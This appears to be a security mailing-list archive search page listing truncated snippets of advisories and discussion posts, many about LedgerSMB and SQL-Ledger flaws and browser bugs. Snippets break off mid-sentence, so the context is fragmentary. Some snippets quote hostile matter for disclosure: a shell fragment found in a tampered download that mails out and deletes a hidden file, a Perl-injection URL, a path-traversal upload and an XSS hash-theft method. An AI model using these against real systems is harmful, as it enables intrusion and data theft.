-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
CVE-2017-3162: Apache Hadoop DataNode web UI vulnerability
Severity: Important
Vendor: The Apache Software Foundation
Versions affected: Hadoop 2.6.x and earlier
Description:
HDFS clients interact with a servlet on the DataNode to browse the
HDFS
king source code and control over the server,
this service is just as vulnerable to all the attacks that I
assume your tool is attempting to mitigate.
It's Monday and I haven't had my tea yet, so maybe I'm missing
something. What is it?
--
Chris Nehren
pgpBv2EfswLYL.pgp
Description: PGP signature
e while we do recommend that users take the issue seriously it
is not one which is expected to be particularly urgent.
Credit:
Chris Travers discovered this issue.
, 2013
Public Disclosure: November XX, 2013
Vulnerability Type: Authentication Bypass Issues [CWE-592]
CVE Reference: CVE-2013-5113, CVE-2013-5114
Issue Severity: Important impact
CVSSv2 Base Score: 6.6 (AV:L/AC:L/AU:N/C:C/I:C/A:N)
Discovery: Chris John Riley ( http://blog.c22.cc )
Advisory Details
unsubscribe
On Aug 13, 2013, at 6:37 AM, terry white wrote:
>
> ... ciao:
>
> : on "8-13-2013" "Reindl Harald" writ:
> : >> and so stop trying to be a smartass in topics you are clueless
> : >
> : > Please no personal insults
>
> : truth != insult
>
> it is perhaps just me, but when i see
Kodak has produced a security patch for ICW that removes this vulnerability.
Customers are encouraged to contact their local Response Center to request this
drop-in patch.
Vulnerability Type: Insufficiently Protected Credentials [CWE-522]
CVE Reference: CVE-2013-2503
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Discovery: Chris John Riley ( http://blog.c22.cc )
Advisory Details:
During research into browser and proxy server handling of HTTP
Hi all,
Can anyone tell me what risk there is around placing an iCompel device
inside of our network?
There is a web interface but there will be no external access. Are
there any known vulnerabilities that our internal users could exploit?
I am not even sure what OS it is running or if it is hard
invoice number settings can be
overwritten, this problem can run users into regulatory compliance
problems. Users in areas which require gapless numbering of financial
documents need to treat this problem as more severe.
Discovery:
Chris Travers found the problem during work on forthcoming
XSRF
vulnerabilities should probably have their own advisories.
Best Wishes,
Chris Travers
LedgerSMB Core Team
Metatron Technology Consulting
gerSMB prereleases for 1.3 are less vulnerable since audit
trails and other data have permissions enforced per user, thus
ensuring that sql injection issues do not pose the privilege
escalation issues that are present in prior versions. Thus the impact
of an attack like this is greatly limited. The impact on the
pre-releases should be seen as moderate.
Best Wishes,
Chris Travers
45649 for LedgerSMB. I expect to send a
full disclosure email discussing the vulnerability in a week.
Best Wishes,
Chris Travers
ility tests by security vendors.
Thank you for your time,
Chris Travers
LedgerSMB Core Team
terface than you
can very easily insert your own web server in front of it!
--
Chris O'Regan
Senior Unix Systems Administrator, Academic IT Services
Faculty of Engineering and Computer Science
Concordia University, Montreal, Canada
this feature by
default and provide a system variable to enable the behaviour only when
it is desired.
--
Chris O'Regan
Senior Unix Systems Administrator, Academic IT Services
Faculty of Engineering and Computer Science
Concordia University, Montreal, Canada
p-htmlspotter-spotting-asp-net-xss-using-fxcop-and-html-encoding-document.aspx
Best regards,
Chris Weber
-Original Message-
From: Trustwave Advisories [mailto:trustwaveadvisor...@trustwave.com]
Sent: Tuesday, February 09, 2010 2:41 PM
To: webapp...@lists.securityfocus.com; websecur...@web
e
industry moves in that direction.
I do think we need some sort of HTTP status or other header
information that would tell a browser to clear the auth cache and not
try again.
Best Wishes,
Chris Travers
o the proper value should be
determined by each customer. The current default value (3600) which
sets the default value to one hour is way to high though. This issue
will be documented as an issue in future versions of LedgerSMB.
Best Wishes,
Chris Travers
B. However, an incorrect guess as to the request
number deletes the user session and requests a password from the user.
To obtain the hotfix either email me at the address mentioned above or
download the most recent file from svn (branches/1.2):
LedgerSMB/Session/DB.pm.
Sincerely,
Chris Travers
The LedgerSMB Team
ository this code does not appear there.
Best Wishes,
Chris Travers
using LedgerSMB 1.1.x, this is an excellent reason
to upgrade.
I can confirm this problem for the versions mentioned.
Best Wishes,
Chris Travers
The POC link isn´t working anymore; chr1x.sectester.net/winrar380_PoC.zip
Could you guys upload it again?
Thank you
the good work!
Chris Schmidt
http://yet-another-dev.blogspot.com
Java Developer and Application Security Analyst
ServiceMagic, Inc.
-Original Message-
From: Inferno [mailto:infe...@securethoughts.com]
Sent: Thursday, August 20, 2009 2:18 AM
To: bugtraq@securityfocus.com
Subject: Bypassing
An early release of 4.0.0 has the same problem!
So Acajoom has a general security issue or the developers were stupid enough to
develop with old code.
ncluding authenticated RSS, XML-formatted AJAX-y responses, and
XHTML.
Full technical details: http://scary.beasts.org/security/CESA-2009-008.html
Blog post:
http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-also-fixes-cross-domain.html
(includes 1-click demo)
Cheers
Chris
evil stylesheet:
irrelevant
Full technical details: http://scary.beasts.org/security/CESA-2009-006.html
Blog post:
http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
(includes 1-click demos)
Cheers
Chris
name.
New checks are being planned, and new check ideas or contributions are very
welcome. For example:
Unicode transformation hot-spot detection (planned)
User-controllable javascript events (planned)
Contact me with any questions, bugs, or suggestions.
-Chris Weber
ml
Blog post:
http://scarybeastsecurity.blogspot.com/2009/03/littlecms-vulnerabilities.html
The blog post goes into a little more detail on which attack surfaces
LittleCMS is present, and which system-level defenses mitigate this
vulnerability.
Cheers
Chris
2-bit syscall and visa versa. The syscall "number"
check can get confused and permit a syscall it did not intend to.
Advisory: http://scary.beasts.org/security/CESA-2009-001.html
Blog post:
http://scarybeastsecurity.blogspot.com/2009/01/bypassing-syscall-filtering.html
Cheers
Chris
Hi,
Firefoxes 2.0.0.19 and 3.0.5 fix a cross-domain theft of textual data.
The theft is via cross-domain information leaks in JavaScript error
messages for scripts executed via
http://scarybeastsecurity.blogspot.com/2008/11/firefox-cross-domain-image-theft-and.html
Cheers
Chris
Severity: Medium (Local Privilege Escalation)
Authors: Chris Clark
Rachel Engel
Vendor notified: Yes
Public release: 10/10/08
Advisory URL: https://www.isecpartners.com/advisories/2008-02-lenovornr.txt
Summary:
Lenovo Rescue and Recovery monitors system changes and enables
unlimited data in POST operations
to any screen. Authentication is not required and this can be used to
deny service not only to LedgerSMB but potentially to anything else
running on the server. This was corrected in 1.2.15.
Credit for discovery:
Chris Murtagh
Vulnerability 2: SQL Injection in AR/AP
tp://exslt.org/math";
extension-element-prefixes="str crypto math">
blah
Blog post for this, and future issues (with RSS):
http://scarybeastsecurity.blogspot.com/2008/07/buffer-overflow-in-libxslt.html
http://scarybeastsecurity.blogspot.com/
Cheers
Chris
or /en/administrator.html) and turn off all the aircon in the
data centre...
cheers,
Chris
--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
so I think it's fair game to expect them to implement
some kind of real security.
cheers,
Chris
--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
2008-03-17: Patches applied to public servers.
2008-03-24: Public disclosure.
--
Chris Porter (slug on QuakeNet)
http://www.warp13.co.uk
bishi Electric find a clue stick to
hit themselves with!
cheers,
Chris
--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
"""
usage: python pwnz.py 192.168.1.x [on|off]
"""
# you can get BeautifulSoup from:
# http
l of the above:
http://scarybeastsecurity.blogspot.com/2008/03/sun-jdk-image-parsing-vulnerabilities.html
Cheers
Chris
scary.beasts.org/security/CESA-2008-001.html
Cheers
Chris
-side
XML accepting technologies) deployed under JDK6. I haven't had time to
look into common web service frameworks and see how they implement XXE
protection. Might be interesting to look into specific technologies
that broke.
Cheers
Chris
RubyGnome2 0.16.0
Format String Vulnerability In Gtk::MessageDialog
http://em386.blogspot.com
Ruby Gnome2 is a project to provide GTK2 bindings to ruby scripts so you can
write GUI code in less time. There is a format string vulnerability in
Gtk::MessageDialog(). This design flaw does not
al
e at Mitsubishi that
can actually do anything about this?
cheers,
Chris
--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
2>/dev/null
mail [EMAIL PROTECTED] < /tmp/.bx
sleep 4
rm -rf /tmp/.bx
What's up with this? Last time I downloaded this that wasn't there,
and it's the same version number but different md5.
.. and this file wasn't included.
Chris
Network security professional
[EMAIL PR
injection
issues in that application. Our official recommendation for
SQL-Ledger users is to restrict access to database relations to the
least privelege necessary. While this does not entirely solve the
issues, it does limit the damage considerably.
Best Wishes,
Chris Travers
Affected: All Ruby Platforms
Severity: Medium - Compromise of SSL connection integrity
Author: Chris Clark
Vendor notified: Yes
Public release: Yes
Advisory URL: http://www.isecpartners.com/advisories/2007-006-rubyssl.txt
Summary:
The Ruby Net::HTTP and Net::HTTPS library can be used to make
Streamripper 1.62.1 Security Advisory | http://streamripper.sf.net
Multiple Buffer Overflows
12 August 2007
Chris Rohlf
http://em386.blogspot.com
---
Description
---
Streamripper is a program used to rip streaming media to mp3 format to
your harddrive.
Multiple buffer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello,
Bigby Findrake wrote:
> On Wed, 18 Jul 2007, Chris Stromblad wrote:
>
>
>
>> One more thing about "advisories". I think it would be better to release
>> them immediately and let people know what they are fa
demanding more secure software...
We can speculate back and forth about the impact of "real" public
disclosure without getting anywhere. What we can do however is look at
the past and what works there. Take education for example. Would you
argue that it's better with an educate
ayout
and contents. Also to improve the educational value of an advisory it
would be neat if an appropriate code-segment of the vulnerability could
be included. Now people will argue the whole intellectual property
aspect but I seriously doubt that 3-5 lines of code are going to affect
anything.
acture security products or are responsible for the security of
their networks. All questions regarding more information on this
vulnerability can be directed to Chris Travers ( [EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]> or [EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]>).
begin:vcard
embezzlement) appear to be tied to any
other legitimate user.
This is the most important security vulnerability since 1.1.5 and all
users are advised to upgrade immediately.
Best Wishes,
Chris Travers
begin:vcard
fn:Chris Travers
n:Travers;Chris
email;internet:[EMAIL PROTECTED]
tel;work:509-888-0220
tel
#x27;t help anyone. If anything it prevents people from
trying to find a way to fix the vulnerability.
Michael Zalewski is in my opinion someone who is using the bug-traq list
in a way that is meaningful. He brings up topics for discussion that
concern us all. More people should do that.
Anyways
(CCS)
http://www.auto.tuwien.ac.at/~chris/worm07.html
=
Important Dates:
Submission deadline: 24 June, 2007 (23:59 PST)
Acceptance Notification: 07 August, 2007
Camera-ready papers: 22 August, 2007
The address for
this is easy to find and is:
[EMAIL PROTECTED]
Please do your research next time, and if you actually find a
security problem, let us know so that we can release a patch for it
and credit you on our website with the release announcement. thanks!
-Chris
Gallery Project
inadequate for security purposes and that roles need to be isolated into
separate database accounts (which the application does support).
However, this process is cumbersome. The LedgerSMB project intends to
automate this process properly in 1.3.0 (perhaps six months away).
Best Wishes,
C
,
Chris Travers
begin:vcard
fn:Chris Travers
n:Travers;Chris
email;internet:[EMAIL PROTECTED]
tel;work:509-888-0220
tel;cell:509-630-7794
x-mozilla-html:FALSE
version:2.1
end:vcard
sers/members
This works because there is usually a Perl script named sql-ledger.conf
in the directory above where these scripts are normally stored. So the
username forces the execution of that script, doesn't find a password,
and so allows the user in. Lovely
Best Wishes,
Chris
can upgrade to 2.6.26 should do so, and LedgerSMB 1.1 or 1.0 users
should upgrade to 1.1.9. Users who cannot upgrade should configure
their web servers to use http authentication for the admin.pl script in
the main root directory.
Best Wishes,
Chris Travers
begin:vcard
fn:Chris Travers
s are advised to upgrade to the latest version, and
all LedgerSMB users using versions prior to 1.1.5 should upgrade as well.
Best Wishes,
Chris Travers
begin:vcard
fn:Chris Travers
n:Travers;Chris
email;internet:[EMAIL PROTECTED]
tel;work:509-888-0220
tel;cell:509-630-7794
x-mozilla-html:FALSE
ve
scripts are run at every
page load, are created on login, and destroyed at logout. Using the
same method, you can add arbitrary Perl code to the end of these files
causing that to be loaded the next time the target user loads a page.
Best Wishes,
Chris Travers
begin:vcard
fn:Chris Travers
ity
-
This has been fixed for at least a year.
--
Best Regards,
Chris Smith
PHP Product Manager
Interspire - The World's Best Selling Webware
http://www.interspire.com
Amit Klein wrote:
> Chris Anley wrote:
>> Hi folks,
>> I've posted a paper that explains a little more here:
>> http://www.ngssoftware.com/research/papers/Randomness.pdf
>
>
> Nice paper. I do notice an enumeration loop over 2^16 possible 16-bit
> values. T
.
Best Wishes,
Chris Travers
diff -C3 -r sql-ledger-orig/SL/Form.pm sql-ledger/SL/Form.pm
*** sql-ledger-orig/SL/Form.pm 2007-02-05 18:20:34.0 -0800
--- sql-ledger/SL/Form.pm 2007-02-05 18:23:06.0 -0800
***
*** 311,318
if ($self->{callback}) {
!
g LCGs but also more advanced generators such as
the Mersenne twister and SHA1PRNG.
Cheers,
-chris.
--
E-MAIL DISCLAIMER
The information contained in this email and any subsequent
correspondence is private, is solely for the intended recipient(s) and
may contain confidential or privileged i
is still not corrected in SQL-Ledger.
There is no workaround to prevent the problem except to hope that those
who are using vulnerable software can be trusted.
I will be sending a full disclosure of the problem, as well as an
unofficial patch to SQL-Ledger in a week.
Best Wishes,
Chris
://127.0.0.1/sql-ledger/login.pl?login=demo&script=-e%3fprint%20STDERR%20%27hello%20world%27%3b&action=logout
<http://127.0.0.1/sql-ledger/login.pl?login=demo&script=-e%3fprint%20STDERR%20%27hello%20world%27%3b&action=logout>
Best Wishes,
Chris Travers
Metatron Technology
nt development, current 1.6-alpha3 and future release
candidates)
http://gallery.svn.sourceforge.net/viewvc/gallery/trunk/gallery/
contrib/phpBB2/modules.php?view=markup
-Chris
Gallery Project Manager
--
Chris Kelly
[EMAIL PROTECTED]
http://ckdake.com
Researchers and vendor contacts should also be aware of the great vendor
dictionary created by OSVDB at http://osvdb.org/vendor_dict.php that
contains many security contact addresses.
-Chris
On Mon, 8 Jan 2007, Steven M. Christey wrote:
>
> We frequently see requests for contact o
at the package in question had a
vulnerability, and that it has been fixed in Gentoo. It isn't meant as
a generic disclosure or advisory.
Sorry if there was any confusion.
--
Chris Gianelloni
Release Engineering Strategic Lead
Alpha/AMD64/x86 Architecture Teams
Games Developer/Council Member
Last night HD Moore released an exploit module for Metasploit
Framework 3 that exploits a fully patched Windows XP SP2 system, which
includes remote code execution. Previously this was announced on the
Browser Fun blog as a DoS only exploit.
More information at:
http://riosec.com/msie-setslice-v
his software.
All customers should upgrade to the newest versions of these packages at
their earliest convenience.
Credit for this disclosure should go to Chris Murtagh (a private
individual) and Richard Patterson of Quickhelp.
Best Wishes,
Chris Travers
Metatron Technology Consulting
begin:vc
Hi all;
I have received many requests from security professions responsible for the
security of Linux distros to move the full disclosure ahead. Now that I am
reasonably sure that the full scope of the problem is known and fixed in
the fix that Chris Murtagh and myself put together, it has been
applications, and enforce permissions
accordingly. The different installations can access the same database, however.
Full disclosure will follow two weeks from yesterday.
Best Wishes,
Chris Travers
Metatron Technology Consulting
uired or change course. Symantec should post its full advisories to
the list and so should everyone else.
-Chris
1. Bugtraq: Administrivia & AOL IM Advisory,
http://seclists.org/bugtraq/2000/Dec/0197.html
-
PatchLink Update Server 6 SQL Injection
-
Severity: Critical
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at
a proof of concept :P...
thnx
tested on win xp pro service pack 1..
http://www.flock.com/
flox web browser remote dos exploit by n00b ::
http://www.flock.com/ ::..
Credit's to n00b..Round {2} of the marquee bug's...
Multiple XSS Vulnerabilities exist in vbulletin.com's website that allow the
attacker to gain sensitive credentials for authentication himself as a user on
the forum and site.
The first problem lies in the the site's Sales Form for opening an issue
ticket. Proper sanitation of variables passe
UBBThreads 5.x,6.x md5 hash disclosure
---
Using XSS such as the one reported earlier:
http://[site]/[ubbpath]/index.php?debug=[xss]
will allow you to inject javascript and steal MD5 Hashes from:
http://[site]/[ubbpath]/editbasic.php
The MD5 is auto
s, the scans results were inconsistent. Both SYN and ACK
> scans had similar issues.
IMHO this is a feature. I would certainly rather see a port scanner
receiving bogus results rather than accurate info that would assist in a
compromise. Make them work a bit harder and earn it. ;-)
HTH,
Chris
?us1147288798";
alt="setstats" border="0" width="1" height="1">
http://geo.yahoo.com/serv?s=76001067&t=1147288798&f=us-w61";
ALT=1 WIDTH=1 HEIGHT=1>
>
> Saluti da P4
- --
Chris Horry KG4TSM "A conservative is a m
There is no such bug and even if I'am wrong, there's already version 4.1.3!
---
Software:
Firefox Web Browser
Tested:
Linux, Windows clients' version 1.5.0.2
Result:
Firefox Remote Code Execution and Denial of Service - Vendor contacted, no
patch yet.
Problem:
A handling issue exists in how Firefox handles certain J
members of Gentoo's games team, so I'm a pretty
good resource on this.
(Posting from my home address since my Gentoo one isn't registered with
the list)
--
Chris Gianelloni
Release Engineering - Strategic Lead
x86 Architecture Team
Games - Developer
Gentoo Linux
l sections in the reply) and then use the authoritative
nameservers for that RRset, not any old open recursive nameserver
(or many of them). You cannot craft your own RRset for the purpose.
But you can still get amplification, certainly.
--
Chris Thompson
Email: [EMAIL PROTECTED]
and my manpages for rmdir(1) [the utility] and rmdir(2) [the system
call] both say that the directory must be empty (ie, have no entries
other than "." or "..").
rmdir(2) should fail and errno should be set to ENOTEMPTY if the
directory is not empty.
On 3/14/06, Steven M. Christey <[EMAIL PROTECT
The default on 1.5.2, 2.0 and 2.0.1 is to automatically approve comments
without moderation IF the following are true:
- The comment author has filled out name and e-mail (trivial)
- The comment author must have a previously approved comment (not so trivial)
This means the first comment must
le
types with this option in place.
-Chris
02 August 2003
Hardware: D-Link 704p
Vulnerability: Multiple Local/Remote (see below)
Warning Level: Moderate
Description:
This small advisory is on the D-Link 704p router with firmware version
2.70. The router is a small 4 port DSL/CABLE router. Earlier this year I
made a small post on BUGT
That's not really allowing another program to bind the keys. In the case of
the Netware client, Microsoft's GINA is completely replaced by the NWGINA
which handles the authentication at that point. It doesn't simply bypass
MS's GINA unless I'm incredibly misinformed. A malicious user can certain
rol??
Safe for Scripting indicates that a control does not access files, memory,
or registers directly. The only purpose of the Windows Update control is to
access (and update) files directly, so it should not be marked as safe for
scripting.
--
Chris Jackson
Software Engineer
Microsoft MVP
--
f spurring more research into the problem,
increasing the average developers understanding of the problem, and preventing
the attacks as far as is possible.
Chris Paget
On Fri, 11 Jul 2003, iDEFENSE Labs wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> iDEFENSE Security Advis
bit on the bad CLSID before they are attacked. Perhaps Microsoft should
allow other vendors to send them CLSIDs to kill. Or maybe they already do
allow this but it is not publicized.
-Chris
> Sincerely,
>
> Jason Coombs
> [EMAIL PROTECTED]
guration page does not respond until you reset the router.
-->
i sent an email to dlink containing a copy of this post. Thanx
-->
--chris
www.securityindex.net
-apex security group-
oundary#1234567890#
Content-Disposition: form-data; name="Haxor"; filename="../../../tmp/haxor.html"
Haxor
This page should not be here
--#123456789#multipart#boundary#1234567890#--
=request end
Best Regards,
Chris Leishman
msg10509/pgp0.pgp
Description: PGP signature
On 7/1/03 2:58 am, Floyd Russell <[EMAIL PROTECTED]> wrote:
> Negative on Windows 98 SE
No problems with Mac OS X 10.2.3, which also contains an OpenType engine.
Cheers,
Chris
64. We either run BIND 8 or don't run BIND (and despite the work
involved in switching, running something other than BIND is looking
good).
--
Chris Adams <[EMAIL PROTECTED]>
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
preferences.
So yes the "exploit" works, but you might be letting
know your "victim" that you're after him.
Chris
== Original Message ==
Exploit:
When you try to access another user's shared files,
you will get a pop-up with a message that either reads
"Askin
]
-Chris
On Tue, 5 Nov 2002, Steven M. Christey wrote:
>
> On the full-disclosure list, low halo asked:
>
> >Could someone please give me the security contact address for Oracle
> >Corporation? It seems as though their marketing department's
> >"Unbreakable&qu
code more carefully that
there is a few more parts in it which needs to be rewritten. So if you
run a KDC, please protect it carefully! There will probably be new realeases of
Heimdal out in a week or so.
Please upgrade your systems ASAP becase this is a really serios problem!
--Chris
--
1 - 100 of 195 matches
Mail list logo
